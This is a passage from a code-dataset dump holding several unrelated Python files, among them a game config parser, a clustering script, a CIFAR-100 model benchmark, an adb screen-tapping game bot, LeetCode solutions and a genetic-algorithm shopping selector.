return_data['result'] = 'ok'\r\n else:\r\n return_data['result'] = \"ng\"\r\n print('人当前的位置 : {}'.format(_r))\r\n print('目标当前位置 : {}'.format(_o))\r\n print('箱子当前位置 : {}'.format(_p))\r\n return return_data\r\n\r\n @staticmethod\r\n def get_config_value(opt='', config_file=r'../Config/game1.config'):\r\n config = NewConfigParser()\r\n try:\r\n config.read(config_file, encoding='utf-8')\r\n if not config.has_section(\"game\"):\r\n print(\"There is no section game, Please check this config.\" + config_file)\r\n return \"no\"\r\n if not config.has_option(\"game\", opt):\r\n print(\"There is no option, \" + opt + \". Please check this config.\" + config_file)\r\n return \"ng\"\r\n else:\r\n value = config.get(\"game\", opt)\r\n return value\r\n\r\n except configparser.DuplicateOptionError as doe:\r\n print(\"{} 有问题,需要查看 {}\".format(doe, config_file))\r\n pass\r\n\r\n # 每次只解析一个游戏就好了。不需要全部都解析\r\n @staticmethod\r\n def parser_config(game_config):\r\n config = {}\r\n background = []\r\n ren = []\r\n goal = []\r\n push = []\r\n wall = []\r\n f = game_config\r\n flag = Common().get_config_value(opt=\"bx\", config_file=f)\r\n if flag == \"no\" or flag == \"ng\":\r\n print(\"{} 没有game标签或者没有值。\".format(\"bx\"))\r\n return \"no\"\r\n else:\r\n background.append(int(flag))\r\n flag = Common().get_config_value(opt=\"by\", config_file=f)\r\n if flag == \"ng\":\r\n print(\"{} 没有值。\".format(\"by\"))\r\n return \"no\"\r\n else:\r\n background.append(int(flag))\r\n array = [['*' for i in range(int(background[0]))] for j in range(int(background[1]))]\r\n flag = Common().get_config_value(opt=\"rx\", config_file=f)\r\n if flag == \"ng\":\r\n print(\"{} 没有值。\".format(\"rx\"))\r\n return \"no\"\r\n else:\r\n ren.append(int(flag))\r\n flag = Common().get_config_value(opt=\"ry\", config_file=f)\r\n if flag == \"ng\":\r\n print(\"{} 没有值。\".format(\"ry\"))\r\n return \"no\"\r\n else:\r\n ren.append(int(flag))\r\n config['r'] = ren\r\n array[int(ren[0])][int(ren[1])] = \"R\"\r\n ox = []\r\n for m in range(1, background[0]):\r\n value = Common().get_config_value(opt=\"ox\" + str(m), config_file=f)\r\n if value != \"ng\":\r\n ox.append(int(value))\r\n else:\r\n break\r\n oy = []\r\n for n in range(1, background[1]):\r\n value = Common().get_config_value(opt=\"oy\" + str(n), config_file=f)\r\n if value != \"ng\":\r\n oy.append(int(value))\r\n else:\r\n break\r\n for o in range(len(ox)):\r\n goal.append([int(ox[o]), int(oy[o])])\r\n array[int(ox[o])][int(oy[o])] = \"O\"\r\n config[\"o\"] = goal\r\n\r\n px = []\r\n for m in range(1, background[0]):\r\n value = Common().get_config_value(opt=\"px\" + str(m), config_file=f)\r\n if value != \"ng\":\r\n px.append(int(value))\r\n else:\r\n break\r\n py = []\r\n for n in range(1, background[1]):\r\n value = Common().get_config_value(opt=\"py\" + str(n), config_file=f)\r\n if value != \"ng\":\r\n py.append(int(value))\r\n else:\r\n break\r\n for p in range(len(px)):\r\n push.append([int(px[p]), int(py[p])])\r\n array[int(px[p])][int(py[p])] = \"P\"\r\n config[\"p\"] = push\r\n config[\"arr\"] = array\r\n return config\r\n\r\n @staticmethod\r\n def get_config(file_path):\r\n get_files = []\r\n for (root, dirs, files) in os.walk(file_path):\r\n for file in files:\r\n if \".config\" in file:\r\n get_files.append(os.path.join(root, file))\r\n\r\n return get_files\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n c = Common()\r\n for i in range(len(c.array)):\r\n print(c.array[i])\r\n o = [[2, 3], [4, 6]]\r\n p = [[3, 3], [5, 6]]\r\n r = [4, 3]\r\n for i in range(len(o)):\r\n c.array[o[i][0]][o[i][1]] = \"O\"\r\n for i in range(len(p)):\r\n c.array[p[i][0]][p[i][1]] = \"P\"\r\n c.array[r[0]][r[1]] = \"R\"\r\n\r\n set_data = {\"arr\": c.array, 'o': o, 'p': p, 'r': r, 'q': ''}\r\n ll = c.up(set_data)\r\n\r\n if ll == 'ng':\r\n print(\"重新输入。\")\r\n exit()\r\n for i in range(len(ll['arr'])):\r\n print(ll['arr'][i])\r\n\r\n # lll = c.right(ll)\r\n # for i in range(len(lll['arr'])):\r\n # print(lll['arr'][i])\r\n","sub_path":"GUITest/PushTheBoxGUIKeyPress/Common/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":17217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209152437","text":"import numpy as np\r\nimport math\r\nfrom random import random, randrange\r\nfrom PIL import Image\r\nimport random\r\nfrom scipy import spatial\r\nimport matplotlib.pyplot as plt\r\nimport csv \r\nimport sys\r\n\r\nnodes=[]\r\npoints = []\r\nwith open('dataset.csv') as csv_file:\r\n csv_reader = csv.reader(csv_file, delimiter=',')\r\n for row in csv_reader:\r\n points.append((int(row[0]),int(row[1])))\r\n\r\ndef dist(a, b):\r\n return math.dist(a,b)\r\n \r\nclass Node:\r\n def __init__(self,tupla):\r\n self.point = tupla\r\n self.cluster = -1\r\n self.dimensions = len(self.point)\r\n\r\n def getItems(self,r):\r\n global tree\r\n temp = []\r\n data = tree.query_ball_point(self.point,r)\r\n # print(data)\r\n for item in data:\r\n temp.append(nodes[item])\r\n return temp\r\n\r\nclass Cluster:\r\n def __init__(self,x,r=1):\r\n self.number = x\r\n self.items = []\r\n self.r = r\r\n self.itemCount = 0\r\n\r\n def build_cluster(self,node):\r\n global tree\r\n self.items.append(node)\r\n self.itemCount += 1\r\n node.cluster = self.number\r\n neighbours = node.getItems(self.r)\r\n for neigh in neighbours:\r\n if neigh.cluster == -1:\r\n # print(\"HERE - \", neigh.point)\r\n self.build_cluster(neigh)\r\n\r\n def isValid(self):\r\n return self.itemCount >= 2\r\n\r\n def define(self, node):\r\n self.build_cluster(node)\r\n if(not self.isValid()):\r\n for i in range(len(self.items)-1, -1, -1):\r\n self.items[i].cluster = -2\r\n self.items.pop()\r\n return False\r\n return True\r\n\r\n\r\nfor point in points: \r\n nodes.append(Node(point))\r\n\r\n\r\ntree =spatial.KDTree(points)\r\n\r\nclusters = []\r\nsize = len(nodes)\r\n\r\nr = 1 \r\n\r\ncluster_num = 0\r\nfor node in nodes:\r\n if node.cluster == -1:\r\n new_cluster = Cluster(cluster_num)\r\n if(new_cluster.define(node)):\r\n clusters.append(new_cluster)\r\n cluster_num += 1\r\nprint(\"asdas: \")\r\n\r\nfor x in clusters:\r\n print(x.items)\r\n print(\"------------\")\r\nprint(\"cluster_num: \" + str(cluster_num))","sub_path":"MeanShift2.py","file_name":"MeanShift2.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424989035","text":"\"\"\"\nCoauthors: Haoyin Xu\n Yu-Chung Peng\n\"\"\"\nfrom toolbox import *\n\nimport argparse\nimport random\nfrom sklearn.ensemble import RandomForestClassifier\n\nimport torchvision.models as models\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\n\n\ndef run_naive_rf():\n naive_rf_kappa = []\n naive_rf_ece = []\n naive_rf_train_time = []\n naive_rf_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (naive_rf)\n for samples in samples_space:\n RF = RandomForestClassifier(n_estimators=100, n_jobs=-1)\n cohen_kappa, ece, train_time, test_time = run_rf_image_set(\n RF,\n cifar_train_images,\n cifar_train_labels,\n cifar_test_images,\n cifar_test_labels,\n samples,\n classes,\n )\n naive_rf_kappa.append(cohen_kappa)\n naive_rf_ece.append(ece)\n naive_rf_train_time.append(train_time)\n naive_rf_test_time.append(test_time)\n\n print(\"naive_rf finished\")\n write_result(prefix + \"naive_rf_kappa.txt\", naive_rf_kappa)\n write_result(prefix + \"naive_rf_ece.txt\", naive_rf_ece)\n write_result(prefix + \"naive_rf_train_time.txt\", naive_rf_train_time)\n write_result(prefix + \"naive_rf_test_time.txt\", naive_rf_test_time)\n\n\ndef run_cnn32():\n cnn32_kappa = []\n cnn32_ece = []\n cnn32_train_time = []\n cnn32_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (cnn32)\n for samples in samples_space:\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=data_transforms\n )\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=data_transforms\n )\n cifar_test_labels = np.array(cifar_testset.targets)\n\n cnn32 = SimpleCNN32Filter(len(classes))\n train_loader, valid_loader, test_loader = create_loaders_es(\n cifar_train_labels,\n cifar_test_labels,\n classes,\n cifar_trainset,\n cifar_testset,\n samples,\n )\n cohen_kappa, ece, train_time, test_time = run_dn_image_es(\n cnn32,\n train_loader,\n valid_loader,\n test_loader,\n )\n cnn32_kappa.append(cohen_kappa)\n cnn32_ece.append(ece)\n cnn32_train_time.append(train_time)\n cnn32_test_time.append(test_time)\n\n print(\"cnn32 finished\")\n write_result(prefix + \"cnn32_kappa.txt\", cnn32_kappa)\n write_result(prefix + \"cnn32_ece.txt\", cnn32_ece)\n write_result(prefix + \"cnn32_train_time.txt\", cnn32_train_time)\n write_result(prefix + \"cnn32_test_time.txt\", cnn32_test_time)\n\n\ndef run_cnn32_2l():\n cnn32_2l_kappa = []\n cnn32_2l_ece = []\n cnn32_2l_train_time = []\n cnn32_2l_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (cnn32_2l)\n for samples in samples_space:\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=data_transforms\n )\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=data_transforms\n )\n cifar_test_labels = np.array(cifar_testset.targets)\n\n cnn32_2l = SimpleCNN32Filter2Layers(len(classes))\n train_loader, valid_loader, test_loader = create_loaders_es(\n cifar_train_labels,\n cifar_test_labels,\n classes,\n cifar_trainset,\n cifar_testset,\n samples,\n )\n cohen_kappa, ece, train_time, test_time = run_dn_image_es(\n cnn32_2l,\n train_loader,\n valid_loader,\n test_loader,\n )\n cnn32_2l_kappa.append(cohen_kappa)\n cnn32_2l_ece.append(ece)\n cnn32_2l_train_time.append(train_time)\n cnn32_2l_test_time.append(test_time)\n\n print(\"cnn32_2l finished\")\n write_result(prefix + \"cnn32_2l_kappa.txt\", cnn32_2l_kappa)\n write_result(prefix + \"cnn32_2l_ece.txt\", cnn32_2l_ece)\n write_result(prefix + \"cnn32_2l_train_time.txt\", cnn32_2l_train_time)\n write_result(prefix + \"cnn32_2l_test_time.txt\", cnn32_2l_test_time)\n\n\ndef run_cnn32_5l():\n cnn32_5l_kappa = []\n cnn32_5l_ece = []\n cnn32_5l_train_time = []\n cnn32_5l_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (cnn32_5l)\n for samples in samples_space:\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=data_transforms\n )\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=data_transforms\n )\n cifar_test_labels = np.array(cifar_testset.targets)\n\n cnn32_5l = SimpleCNN32Filter5Layers(len(classes))\n train_loader, valid_loader, test_loader = create_loaders_es(\n cifar_train_labels,\n cifar_test_labels,\n classes,\n cifar_trainset,\n cifar_testset,\n samples,\n )\n cohen_kappa, ece, train_time, test_time = run_dn_image_es(\n cnn32_5l,\n train_loader,\n valid_loader,\n test_loader,\n )\n cnn32_5l_kappa.append(cohen_kappa)\n cnn32_5l_ece.append(ece)\n cnn32_5l_train_time.append(train_time)\n cnn32_5l_test_time.append(test_time)\n\n print(\"cnn32_5l finished\")\n write_result(prefix + \"cnn32_5l_kappa.txt\", cnn32_5l_kappa)\n write_result(prefix + \"cnn32_5l_ece.txt\", cnn32_5l_ece)\n write_result(prefix + \"cnn32_5l_train_time.txt\", cnn32_5l_train_time)\n write_result(prefix + \"cnn32_5l_test_time.txt\", cnn32_5l_test_time)\n\n\ndef run_resnet18():\n resnet18_kappa = []\n resnet18_ece = []\n resnet18_train_time = []\n resnet18_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (resnet18)\n for samples in samples_space:\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=data_transforms\n )\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=data_transforms\n )\n cifar_test_labels = np.array(cifar_testset.targets)\n\n res = models.resnet18(pretrained=True)\n num_ftrs = res.fc.in_features\n res.fc = nn.Linear(num_ftrs, len(classes))\n train_loader, valid_loader, test_loader = create_loaders_es(\n cifar_train_labels,\n cifar_test_labels,\n classes,\n cifar_trainset,\n cifar_testset,\n samples,\n )\n cohen_kappa, ece, train_time, test_time = run_dn_image_es(\n res,\n train_loader,\n valid_loader,\n test_loader,\n )\n resnet18_kappa.append(cohen_kappa)\n resnet18_ece.append(ece)\n resnet18_train_time.append(train_time)\n resnet18_test_time.append(test_time)\n\n print(\"resnet18 finished\")\n write_result(prefix + \"resnet18_kappa.txt\", resnet18_kappa)\n write_result(prefix + \"resnet18_ece.txt\", resnet18_ece)\n write_result(prefix + \"resnet18_train_time.txt\", resnet18_train_time)\n write_result(prefix + \"resnet18_test_time.txt\", resnet18_test_time)\n\n\nif __name__ == \"__main__\":\n torch.multiprocessing.freeze_support()\n\n # Example usage: python cifar_100.py -m 90\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", help=\"class number\")\n args = parser.parse_args()\n n_classes = int(args.m)\n prefix = args.m + \"_class/\"\n samples_space = np.geomspace(100, 10000, num=8, dtype=int)\n\n nums = list(range(100))\n random.shuffle(nums)\n classes_space = list(combinations_45(nums, n_classes))\n\n # normalize\n scale = np.mean(np.arange(0, 256))\n normalize = lambda x: (x - scale) / scale\n\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=None\n )\n cifar_train_images = normalize(cifar_trainset.data)\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=None\n )\n cifar_test_images = normalize(cifar_testset.data)\n cifar_test_labels = np.array(cifar_testset.targets)\n\n cifar_train_images = cifar_train_images.reshape(-1, 32 * 32 * 3)\n cifar_test_images = cifar_test_images.reshape(-1, 32 * 32 * 3)\n\n run_naive_rf()\n\n data_transforms = transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n )\n\n run_cnn32()\n run_cnn32_2l()\n run_cnn32_5l()\n\n data_transforms = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ]\n )\n\n run_resnet18()\n","sub_path":"benchmarks/vision/cifar_100.py","file_name":"cifar_100.py","file_ext":"py","file_size_in_byte":9960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170431689","text":"import os\nfrom time import sleep\nimport sys\n\n\ndef chapter1():\n click_screen(700,350)\n print('点击进入第一章陨落的废都')\n sleep(1)\n\n\ndef next_chapter():\n click_screen(692,986)\n print('点击下一章按钮')\n sleep(1)\n\n\ndef elite():\n click_screen(1700,490)\n print('点击大师')\n sleep(1)\n\n\ndef master():\n click_screen(1700,670)\n print('点击大师')\n sleep(1)\n\n\ndef subchapter3():\n click_screen(1150,463)\n print('进入第3小节')\n sleep(1)\n\n\ndef subchapter4():\n click_screen(1200,560)\n print('点击进入第4小节')\n sleep(1)\n\n\ndef begin():\n click_screen(1700,800)\n print('进入万象天工')\n sleep(1)\n click_screen(220,256)\n print('进入冒险玩法')\n sleep(1)\n click_screen(1160,810)\n print('进入挑战')\n sleep(1)\n\n\ndef click_screen(x, y):\n # 通过像素点位置点击屏幕,x,y是屏幕坐标\n # 调用adb点击手机屏幕事件\n os.system('adb shell input tap {} {}'.format(x, y))\n\n\nt = 30\ncircle = 80\n\n\ndef entry():\n chapter1()\n master()\n subchapter4()\n click_screen(1700,910)\n print('点击下一步')\n sleep(1)\n click_screen(1650,870)\n print('闯关')\n print(\"开始战斗...\")\n sleep(1)\n global t\n tt = t\n while tt >= 0:\n sleep(1)\n click_screen(1060, 540)\n print(tt, flush=True)\n tt = tt - 1\n global circle\n n = circle\n while n >= 0:\n print(n, flush=True)\n click_screen(1060, 540)\n sleep(1)\n n = n - 1\n '''\n click_screen(1175,975)\n print('\\n点击屏幕继续')\n sleep(1)\n '''\n\n\ndef repeat():\n click_screen(2000,1000)\n print('点击再次挑战')\n sleep(1)\n click_screen(1650, 870)\n print('点击闯关')\n sleep(1)\n global t\n tt = t\n while tt >= 0:\n click_screen(1060, 540)\n sleep(1)\n print(tt, flush=True)\n tt = tt - 1\n global circle\n n = circle\n while n >= 0:\n print(n, flush=True)\n click_screen(1060, 540)\n sleep(1)\n n = n - 1\n\n\ndef main():\n begin()\n entry()\n for i in range(2, 200):\n print('*' * 50)\n print(\"第{}轮开始\".format(i))\n repeat()\n print('第{}轮结束'.format(i))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"master_1_4.py","file_name":"master_1_4.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465761587","text":"from sys import stdout\nfrom os import linesep\nfrom time import sleep\n\ndef doHeart(message, iterations = 1, delayTime = 0.1):\n for i in range(0, iterations):\n for i in range(90, 97):\n stdout.write(\"\\r\\033[0m[\\033[\" + str(i) + \";1m<3\\033[0m] \\033[0m\" + message)\n stdout.flush()\n sleep(delayTime)\n stdout.write(linesep)\n return\n\ndef i(message, mode = 'i', verbose = False):\n if mode == 'v' and verbose: #VERBOSE\n return input(\"\\033[90;1m\" + message + \"\\033[0m\")\n elif mode == 'e': #ERROR\n return input(\"\\033[91;1m\" + message + \"\\033[0m\")\n elif mode == 's': #SUCCESS\n return input(\"\\033[92;1m\" + message + \"\\033[0m\")\n elif mode == 'w': #WARNING\n return input(\"\\033[93;1m\" + message + \"\\033[0m\")\n elif mode == 'i': #INFORMATION\n return input(\"\\033[94;1m\" + message + \"\\033[0m\")\n else:\n return\n\ndef p(message, mode = 'i', verbose = False, prefix = \"\", suffix = linesep):\n if mode == 'v' and verbose: #VERBOSE\n stdout.write(prefix + \"\\033[0m[\\033[90;1m#\\033[0m] \\033[90;2m\" + message + \"\\033[0m\" + suffix)\n elif mode == 'e': #ERROR\n stdout.write(prefix + \"\\033[0m[\\033[91;1m-\\033[0m] \\033[0m\" + message + \"\\033[0m\" + suffix)\n elif mode == 's': #SUCCESS\n stdout.write(prefix + \"\\033[0m[\\033[92;1m+\\033[0m] \\033[0m\" + message + \"\\033[0m\" + suffix)\n elif mode == 'w': #WARNING\n stdout.write(prefix + \"\\033[0m[\\033[93;1m*\\033[0m] \\033[0m\" + message + \"\\033[0m\" + suffix)\n elif mode == 'i': #INFORMATION\n stdout.write(prefix + \"\\033[0m[\\033[94;1m!\\033[0m] \\033[0m\" + message + \"\\033[0m\" + suffix)\n else:\n return\n stdout.flush()\n","sub_path":"PyPrintSystem.py","file_name":"PyPrintSystem.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"143582837","text":"# https://www.acmicpc.net/problem/2667\n\nn = int(input())\n\n# 지도 입력\nmap = [list(map(int, input())) for _ in range(n)]\ncheck = [[0]*n for _ in range(n)]\n\n# 위, 아래, 왼쪽, 오른쪽 좌표 계산을 위해\ndistance_x = [-1, 1, 0, 0]\ndistance_y = [0, 0, -1, 1]\n\n\ndef dfs(x, y, complex_number):\n check[x][y] = complex_number\n for i in range(4):\n next_x = x + distance_x[i]\n next_y = y + distance_y[i]\n if 0 <= next_x < n and 0 <= next_y < n:\n if map[next_x][next_y] == 1 and check[next_x][next_y] == 0:\n dfs(next_x, next_y, complex_number)\n\n\ncomplex_number = 0\nfor i in range(n):\n for j in range(n):\n if map[i][j] == 1 and check[i][j] == 0:\n complex_number += 1\n dfs(i, j, complex_number)\n\nprint(complex_number)\n\n\nhouse_count = [0] * (complex_number+1)\nfor i in range(n):\n for j in range(n):\n if check[i][j] != 0:\n house_count[check[i][j]] += 1\n\nhouse_count.sort()\nfor i in range(1, len(house_count)):\n print(house_count[i])\n","sub_path":"Graph/complex_numbering.py","file_name":"complex_numbering.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528651291","text":"class Grid:\n\n\n def __init__(self, max_x, max_y):\n\n self.max_x = max_x\n self.max_y = max_y\n\n if max_x < 1:\n raise ValueError(f\"max_x must be greater than 0\")\n if max_y < 1:\n raise ValueError(f\"max_y must be greater than 0\")\n","sub_path":"jc/ihoover/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598255539","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def preorderTraversal(self, root: TreeNode) -> List[int]:\n if not root:\n return\n nodes = []\n res = []\n nodes.append(root)\n\n while len(nodes) > 0:\n curr = nodes.pop()\n res.append(curr.val)\n\n if curr.right != None:\n nodes.append(curr.right)\n\n if curr.left != None:\n nodes.append(curr.left)\n\n return res\n","sub_path":"Easy/Binary Tree Preorder Traversal.py","file_name":"Binary Tree Preorder Traversal.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418860545","text":"class Solution(object):\n def licenseKeyFormatting(self, S, K):\n \"\"\"\n :type S: str\n :type K: int\n :rtype: str\n \"\"\"\n S = S.split('-')\n S = ''.join(S).upper()\n res = []\n for i in range(len(S) // K):\n res.insert(0, S[len(S) - K * (i + 1): len(S) - K * i])\n if len(S) % K != 0:\n res.insert(0, S[:len(S) - K * (len(S) // K)])\n res = '-'.join(res)\n return res\n","sub_path":"482.license-key-formatting.py","file_name":"482.license-key-formatting.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195178869","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom numba import vectorize, int64\nfrom numba import guvectorize, int64\nfrom numba import jit\nfrom pyculib import rand as curand\n#from numba import jit\nimport time\nimport pandas as pd\nimport random\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport copy\nimport os\nfrom numba import cuda\nos.chdir('D:/R.data/DSL_paper')\n\n#----時間紀錄(開始)----\nstartTime = time.time()\n\n#----資料初始化(本地端)----\nsourceData = pd.read_csv('assets_py/StoreData.csv') #讀取原始資料\npreferenceTable = pd.read_csv('assets_py/preferenceTable.csv') #讀取商品偏好表\nsourceData.drop(['序', '輸入格式(序,產品代碼+品名,單價,體積,種類)'], axis = 1, inplace=True) #移除不必要的資料欄位\nsourceData.rename(index=str, columns={\"重量(g)\": \"重量\"}, inplace=True) #重新命名欄位名稱\ngoodData = copy.copy(sourceData) #將原始資料複製一份\nsourceData = sourceData.values\n\ngoodData['Selected'], goodData['Preference'] = 0, 1 #新增被選擇欄位\ngoodData = goodData.values #轉換成ndarry型態\npreferenceTable = preferenceTable.values\n\n\n#----環境參數設定----\nmaxVolume = 47*32*39 #最大箱子體積\nmaxWeight = 16000 #最大重量(g)\npopAmount = 20 #人口數量\ncrossRate = 1 #交配率\nmutationRate = 1 #突變率\neliteValues = round(popAmount*0.1) #菁英數量\nmaxGen = 10000 #世代次數\n\n#----使用者需輸入的參數(假設)----\ndietHabit = '葷食' #葷食與素食的選擇\nuserItemValues = 22 #使用者需要的數量\nmaxPrice = 1500 #使用者金額\nexceptBrandList = np.array(['大同']) #將要剔除的品牌\n\n#----Function----\n#飲食習慣(葷或素食):\n#在開始演算法前先將該飲食習慣給加入\n#若為葷食則包含素食和葷食, 反之只有素食\n#@jit\ndef diet_select(good_data, diet_habit_list):\n #good_data: 原始商品資料集\n #diet_habit_list: 葷食或素食的選擇\n if diet_habit_list=='素食':\n good_data = good_data[good_data[:, 9] == diet_habit_list]\n return(good_data)\n\n#剔除品牌的方法:\n#在開始演算法前先將該品牌給移除\n#@jit\n@jit(nopython=True)\ndef except_brand(good_data, except_brand_list):\n #good_data: 原始商品資料集\n #except_brand_list: 剔除品牌的名稱\n for i in range(len(except_brand_list)):\n good_data = good_data[good_data[:, 4] != except_brand_list[i]] #將要剔除的廠牌移除\n return(good_data)\n\n#偏好值與類別合併:\n#將使用者對商品種類的偏好與原始商品資料進行合併成一個Data Frame, 使原始資料有使用者對每個商品的品項偏好\n#@vectorize(['int32(int32, int32)'], target='cuda')\n#@guvectorize(\"int64[:], int64\", \"(n) -> ()\")\n#@jit\ndef preference_match(good_data, preference_table):\n #gene_list: 被選擇出的基因清單\n #require_goods: 必要性的商品清單\n #non_require_goods: 不必要性的商品清單\n #user_preference: 使用者對商品種類的偏好\n for i in range(len(preference_table)):\n temp = good_data[good_data[:, 8] == preference_table[:,0][i]]\n for j in range(len(good_data[good_data[:, 8] == preference_table[:,0][i]])):\n temp[:, 12][j] = preference_table[:,1][i]\n good_data[good_data[:, 8] == preference_table[:,0][i]] = temp\n return(good_data)\n\n\n\n#@vectorize(['int64(int64, int64, int64, int64, int64)'], target='cuda')\n#@guvectorize([(int64[:], int64[:], int64[:], int64, int64)], '(n), (n), (n), (), ()')\n#@vectorize(['int64(int64[:], int64[:], int64[:], int64, int64)'], target='cuda')\n\ndef initial_pop(good_data, require_goods, non_require_goods, non_require_values, limit_weight):\n #good_data: 原始商品資料集\n #require_goods: 必要性的商品清單\n #non_require_goods: 不必要性的商品清單\n #non_require_values: 不必要性的商品數量\n #limit_weight: 最大重量限制\n while True:\n# temp_good = np.copy(good_data) #先將原始資料暫時給另外一個變數使用 \n temp_good = np.copy(good_data) #先將原始資料暫時給另外一個變數使用 \n for i in range(len(require_goods)):\n get_index = temp_good[(temp_good[:,8] == require_goods[i]) & (temp_good[:, 11] !=1)] #取得符合條件的資料\n temp_index = random.randint(0, (len(get_index)-1)) #隨機取得品項\n get_index = get_index[temp_index] #取得商品名稱\n get_index[11] = 1\n temp_good[temp_good[:,0] == get_index[0]] = get_index\n \n selected_require = np.random.choice(non_require_goods, non_require_values, replace=False)\n \n for i in range(len(selected_require)):\n get_index = temp_good[(temp_good[:,8] == selected_require[i]) & (temp_good[:, 11] !=1)] #取得符合條件的資料\n temp_index = random.randint(0, (len(get_index)-1)) #隨機取得品項\n get_index = get_index[temp_index] #取得商品名稱\n get_index[11] = 1\n temp_good[temp_good[:,0] == get_index[0]] = get_index\n\n selected_good = temp_good[temp_good[:, 11] == 1]\n sum_weight = np.sum(selected_good[:,10])\n if sum_weight <= limit_weight:\n break\n return(selected_good) #回傳結果\n\n#編碼染色體:\n#必要性商品必定方在最前段, 選擇性商品必定放在後段\n#@jit\ndef create_chromosome(gene_list):\n #gene_list: 被選擇出的基因清單\n for i in range(len(gene_list)):\n chromosome = (gene_list[i]['data.frame'][:,0]) \n gene_list[i]['chromosome'] = chromosome\n return(gene_list)\n\n#計算總重量\n#@jit\ndef total_weight(gene_list):\n #gene_list: 被選擇出的基因清單\n for i in range(len(gene_list)):\n sum_weight = np.sum(gene_list[i]['data.frame'][:,10])\n gene_list[i]['totalWeight'] = np.array([sum_weight])\n return(gene_list)\n\n#偏好的適應度方法(算式分母為偏好值1~偏好的最大值)\n#@jit\ndef fitness_preference(gene_list, require_goods, non_require_values, preference_table):\n #gene_list: 被選擇出的基因清單\n #require_goods: 必要性的商品清單\n #non_require_goods: 不必要性的商品清單\n #user_preference: 使用者對商品種類的偏好\n \n max_preference = np.max(preference_table[:,1])\n total_preference = 0\n for i in range(0, max_preference+1, 1):\n total_preference = total_preference+i**2\n \n for i in range(len(gene_list)):\n reuslt = 1\n for j in range((len(require_goods) + non_require_values)):\n temp_preferenced = 1+(((gene_list[i]['data.frame'][:,12][j]**2)-1) / total_preference)\n reuslt *=temp_preferenced\n #temp.append(reuslt)\n \n gene_list[i]['fitPreference'] = np.array([reuslt])\n sum_preferenced = (gene_list[i]['data.frame'][:,12]).sum()\n gene_list[i]['totalPreference'] = np.array([sum_preferenced])\n return(gene_list)\n\n#體積的適應度方法(已加入懲罰值)\n#@jit \ndef fitness_volume(gene_list, bin_volume):\n #gene_list: 被選擇出的基因清單\n #bin_volume: 箱子的乘積\n for i in range(len(gene_list)):\n sum_volume = np.sum(gene_list[i]['data.frame'][:,3]) #將最大限制體積減去每個基因的總體積\n subtraction_volume = bin_volume-sum_volume #容積上限與選擇商品之總體積的差額\n reuslt = abs(subtraction_volume)/bin_volume #將體積適應度算出\n \n if (sum_volume >=(bin_volume*0.7)) & (sum_volume <=bin_volume):\n if subtraction_volume==0:\n reuslt = reuslt + 1 #若適應度等於0就給予懲罰值1, e.g. (49795.2-27749.25)/49795.2=0.4427324, 愈接近0表示價格差距越小\n reuslt = reuslt + 2 #若適應度大於0就給予懲罰值2\n reuslt = reuslt + 3\n \n gene_list[i]['fitVolume'] = np.array([reuslt])\n return(gene_list)\n\n#價格的適應度方法(已加入懲罰值)\n#@jit\ndef fitness_price(gene_list, limit_price):\n #gene_list: 被選擇出的基因清單\n #limit_price: 價格最高限制\n for i in range(len(gene_list)):\n sum_price = 